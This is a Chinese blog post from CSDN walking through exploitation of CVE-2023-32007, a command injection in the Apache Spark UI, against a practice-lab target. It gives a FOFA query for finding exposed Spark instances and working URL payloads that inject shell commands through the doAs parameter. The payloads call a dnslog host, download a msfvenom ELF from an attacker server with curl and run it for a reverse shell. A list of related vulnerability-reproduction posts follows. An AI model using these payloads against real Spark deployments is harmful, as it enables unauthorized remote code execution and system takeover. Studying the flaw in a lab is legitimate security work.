Apache Spark RCE漏洞(CVE-2023-32007)

已于 2024-07-17 23:47:09 修改
阅读量389 收藏 2
点赞数 9
分类专栏: 漏洞复现 春秋云境 文章标签: apache spark 网络安全
于 2024-07-17 23:45:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45240382/article/details/140508505
版权

0x01 前言

Apache Spark 3.4.0 之前版本存在命令注入漏洞,该漏洞源于如果ACL启用后,HttpSecurityFilter 中的代码路径可以允许通过提供任意用户名来执行模拟,这将导致任意 shell 命令执行。
影响范围:

  • Apache Spark 不再维护的版本

漏洞搜索:

# fofa 语法
app="APACHE-Spark-Jobs"

复现准备:

  • 靶机:春秋云境 http://xxxxx.cloudeci1.ichunqiu.com:8080/jobs/
  • 公网服务器:10.10.10.1

0x02 复现

1. 修改 url

修改 url,添加参数 doAs:

http://xxxxx.cloudeci1.ichunqiu.com:8080/jobs/?doAs=`curl http://xxxxx.dnslog.cn`

可以使用公网服务器作为 curl 的参数,用来测试是否执行命令。

2. 上传木马

使用 msfvonom 生成木马并上传

http://xxxxx.cloudeci1.ichunqiu.com:8080/jobs/?doAs=`curl http://10.10.10.1:4444/shell.elf -o shell.elf`

3. 监听上线

使用 msfconsole 在本地进行监听
1721197529729.png

4. 执行木马反弹 shell

http://xxxxx.cloudeci1.ichunqiu.com:8080/jobs/?doAs=`./shell.elf`

1721197607308.png

免责声明

技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!

zneVue.
关注
  • 9
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞复现】Apache Spark 未授权访问漏洞
做自己喜欢的事,并将其发挥到极致!
08-31 4174
Apache Spark 未授权访问漏洞,详情请点击内容进入......
Apache Spark远程代码执行漏洞(CVE-2023-32007)漏洞复现
失心少年
08-24 1290
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!Apache Spark 3.4.0之前版本存在命令注入漏洞,该漏洞源于如果ACL启用后,HttpSecurityFilter中的代码路径可以允许通过提供任意用户名来执行模拟,这将导致任意shell命令执行。
【高危】Apache Spark UI shell 命令注入漏洞(POC)
murphysec的博客
05-16 955
墨菲安全是一家为您提供专业的软件供应链安全管理的科技公司,核心团队来自百度、华为、乌云等企业,公司为客户提供完整的软件供应链安全管理平台,围绕SBOM提供软件全生命周期的安全管理,平台能力包括软件成分分析、源安全管理、容器镜像检测、漏洞情报预警及商业软件供应链准入评估等多个产品。该漏洞是针对此前CVE-2022-33891漏洞的修订,原有漏洞通告中认为3.1.3版本已修复该漏洞,后发现仍受到影响,3.1.3版本已不再维护,官方建议升级至3.4.0版本。该漏洞已存在 POC。
【春秋云镜】CVE-2023-32007 Apache Spark UI 命令注入漏洞
RisingFan的博客
04-19 414
Apache Spark UI 提供了通过配置选项 spark.acls.enable 启用 ACL 的可能性。如果启用了 ACL,则 HttpSecurityFilter 中的代码路径可以允许某人通过提供任意用户名来执行模拟。然后,恶意用户可能能够访问权限检查功能,该功能最终将根据他们的输入构建 Unix shell 命令并执行它。建议用户升级到支持的 Apache Spark 版本,例如 3.4.0 版本。启动环境访问发现是502,原因是点击链接跳转地址中没有端口,查看路径端口为8080。
SolarView Compact跨站脚本攻击漏洞分析 CVE-2022-31373
afei001
07-09 559
日本公司 Contec专注于定制化嵌入式计算、工业自动化和IoT通信技术。该公司的 SolarView 太阳能监控和可视化产品用于3万多个发电站。SolarView Compact v6.0通过组件Solar_AiConf.php发现了一个跨站点脚本(XSS)漏洞。攻击者可利用该漏洞发起站点脚本(XSS)攻击。
WuThreat身份安全云-TVD每日漏洞情报-2023-05-04
wuthreat无胁科技的博客
05-06 925
参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?漏洞编号:CVE-2023-27378。漏洞编号:CVE-2023-30063。
CVE-2022-33891漏洞原理、环境搭建和复现
qq_44767905的博客
07-25 8830
CVE-2022-33891漏洞原理、环境搭建和复现
WinRAR 代码执行漏洞RCE (CVE-2023-38831)-资源包
09-11
WinRAR 是一款功能强大的压缩包管理器,它是档案工具RAR在 Windows环境下的图形界面。该软件可用于备份数据,缩减电子邮件附件的大小,...RARLabs WinRAR 6.23之前版本存在安全漏洞,攻击者利用该漏洞可以执行任意代码。
Apache ActiveMQ RCE漏洞复现(CVE-2023-46604)
0xSec
10-26 8164
ActiveMQ是一个开源的消息代理和集成模式服务器,它支持Java消息服务(JMS) API。它是Apache Software Foundation下的一个项目,用于实现消息中间件,帮助不同的应用程序或系统之间进行通信。Apache ActiveMQ 中存在远程代码执行漏洞Apache ActiveMQ在默认安装下开放了61616服务端口,而该端口并没有对传入数据进行适当的过滤,从而使攻击者能够构造恶意数据以实现远程代码执行。
Apache RocketMQ RCE漏洞复现(CVE-2023-33246)
0xSec
06-01 9372
RocketMQ 5.1.0及以下版本,在一定条件下,存在远程命令执行风险。RocketMQ的NameServer、Broker、Controller等多个组件暴露在外网且缺乏权限验证,攻击者可以利用该漏洞利用更新配置功能以RocketMQ运行的系统用户身份执行命令。此外,攻击者可以通过伪造 RocketMQ 协议内容来达到同样的效果。
pfSense防火墙从XSS到RCECVE-2023-42325 CVE-2023-42327).txt
04-22
pfSense防火墙从XSS到RCECVE-2023-42325 CVE-2023-42327).txt
Apache OFBiz RCE漏洞复现(CVE-2023-51467)
0xSec
12-28 2364
该系统的身份验证机制存在缺陷,可能允许未授权用户通过绕过标准登录流程来获取后台访问权限。此外,在处理特定数据输入时,攻击者可构造恶意请求绕过身份认证,利用后台相关接口功能执行groovy代码,导致远程代码执行
有意思的CVE-2022-0337复现
蚁景网安学院
04-23 863
前两天在刷tw,看到了个比较有意思的一个CVE漏洞,价值奖励是10000美刀,比较好奇的是价值10000美刀的漏洞是什么样子的,漏洞利用就是需要在浏览器中进行用户交互才能触发该漏洞,但由于 Windows 的文件保存默认为接受,通过使用强制您按 ENTER 约 2 秒的技巧简单地泄漏数十个环境变量。
Apache CXF Aegis databinding SSRF 高危漏洞修复
最新发布
JAVA领域优质创作者,基于分片网络查询方法专利发明者。
05-23 1252
2、Spring Web UriComponentsBuilder URL解析不当漏洞修复。Spring Web UriComponentsBuilder URL解析不当漏洞。1、Apache CXF Aegis databinding SSRF漏洞修复。Apache CXF Aegis databinding SSRF漏洞。进入服务器搜索 databinding。三、maven包升级版本查询。如搜索spring-boot。找到了spring-web。发现版本是3.1.6。果断升级到3.5.8。
2024网络安全最全疯狂SparkSparkCore入门
2301_77033672的博客
05-03 503
如果RDD里面存储的数据都是二元组对象,那么这个RDD我们就叫做K,V格式的RDD。
CVE-2022-35741 Apache CloudStack SAML XXE注入
include_voidmain的博客
09-08 558
CVE-2022-35741 Apache CloudStack SAML XXE注入
spark未授权RCE漏洞学习
weixin_30746117的博客
02-19 1667
Spark简介 spark是一个实现快速通用的集群计算平台。它是由加州大学伯克利分校AMP实验室 开发的通用内存并行计算框架,用来构建大型的、低延迟的数据分析应用程序。它扩展了广泛使用的MapReduce计算模型。高效的支撑更多计算模式,包括交互式查询和流处理。spark的一个主要特点是能够在内存中进行计算,及时依赖磁盘进行复杂的运算,Spark依然比MapReduce更加高效。 Spark未...
Apache Spark 未授权访问漏洞复现
yzl_007的博客
08-26 4905
Apache Spark 未授权访问漏洞复现 Apache Spark 未授权访问漏洞复现介绍环境搭建漏洞复现使用msf进行攻击另一个方法 介绍 Apache Spark是一款集群计算系统,其支持用户向管理节点提交应用,并分发给集群执行。如果管理节点未启动ACL(访问控制),我们将可以在集群中执行任意代码。 环境搭建 kali :192.168.89.130 使用vulhub漏洞靶场搭建,进入目录下/spark/unacc ,运行 docker-compose up -d [外链图片转存失败,源站可能有防
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值